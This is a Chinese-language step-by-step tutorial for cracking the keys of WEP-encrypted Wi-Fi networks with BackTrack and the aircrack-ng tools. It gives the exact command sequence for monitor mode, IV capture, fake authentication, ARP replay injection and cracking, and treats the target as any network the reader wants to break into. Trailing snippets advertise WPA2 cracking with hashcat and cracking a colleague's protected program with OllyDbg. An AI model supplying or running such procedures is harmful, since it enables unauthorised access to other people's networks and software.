首先, 需要準備:
1.backtrack 3/4 光碟版或者虛擬機器映象, 也可以是backtrack3 u盤版
2.乙個相容backtrack的無線網絡卡
3.使用web加密的無線網路加入點(指的就是你要破解的無線網路)
需要的全部指令:
(紅色字型的需要替換自身引數)
1) ifconfig -a
(可以檢視到自己機子無線網絡卡的mac位址和無線網絡卡的裝置名稱通常為usb0或者wlan0>), 保留這個視窗方便下幾步檢視需要的資訊, 開啟新命令視窗進入一步)
2) airmon-ng start wlan0 2
(wlan0為無線網絡卡, 2為需要監聽的頻道, 根據自己情況輸入, 此步驟為開啟無線網絡卡的監聽模式)
3) airodump-ng –ivs -w name -c 2 wlan0
(獲取頻道2的所有無線ap的資訊, wlan0是無線網絡卡, 2為頻道, 這一步的頻道需要跟上一步的一致, 命令輸入後會顯示周圍所有頻道為*的無線ap,
顯示的列表:
bssid : 無線ap的mac 位址
pwr:ap訊號的大小
rxq: 干擾值
beacons:傳送和接受的資料報, 有資料傳輸的時候就會跳動
#data: 資料, 破解需要的最關鍵的就是這個
ch:頻道
mb:網路連線速度
essid:ap的名稱
保留這一視窗, 開啟新的命令視窗進入下一步)
4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h *********x wlan0 -1 is -one
(傳送欺騙, ap_essid為ap的名稱, 例如linksys或者tp-link, ap_mac為ap的mac位址, 第三步的bssid就是ap的mac位址, *********為自己無線網絡卡的mac位址, 第一步可以看到. 這一步成功後會顯示successful, 如不成功需要在訊號強的地方重試, 成功後才可以進入下一步)
5) aireplay-ng -3 -b ap_mac -h *********x -x 1024 wlan0
(ap_mac為無線ap的mac位址, 具體看步驟3, ******xx為無線網絡卡的mac位址, wlan0為網絡卡, 這一步執行以後, 開始正確的收發資料報, #data開始**)
6) aircrack-ng -n 64 -b ap_mac name-01.ivs
(開始破解, ap_mac為ap的mac位址, 64指的是使用了64位加密, 多次破解失敗的話可以試128)
多數情況下當#data開始迅速跳動的時候就可以開始破解了, 不需要等到多少包, 如果#data這個資料增長緩慢的話, 換個位置到無線訊號強的地方再試, 命令輸入正確的話最快3分鐘搞定乙個64位加密的web ap是沒問題的!
摘自 kuji labs
Backtrack破解wi fi熱點密碼
也許您已經知道了在設定無線密碼的時候一定要使用wpa加密的方式,因為wep加密會非常容易被破解,那到底有多容易呢?本文將會告訴你如何用backtrack輕鬆破解無線密碼。今天這個教程將一步步教您如何通過使用backtrak系統破解wep加密的 但首先,你必須明白知識雖然是一種力量,但擁有知識並不意味...
用 hashcat 破解 WIFI WPA2破解
首先用cdlinux系統進行抓包,cdlinux抓包我就不詳細說明 到這裡可以檢視如何安裝cdlinux 到這裡可以檢視如何使用cdlinux 進入正題 hashcat是用來破解wpa2的包,當然也可以破解很多東西 如系統密碼 rar md5等等,它比較受歡迎 windows 和linux 都可以,...
用OllyDbg做破解
朋友所託,要幫忙破解乙個mfc的小程式,他急等著用 背景 幾個人合夥創業,其中乙個負責寫這個有點小核心的專案,為了鞏固自己的 地位 搞的小把戲,給加了密,要用必須通過他 我艹 雖說自己搞c 比較多,相對來講native一點,但是對於彙編與破解,了解相當有限,去年這朋友也找過我,因為當時剛換公司比較忙...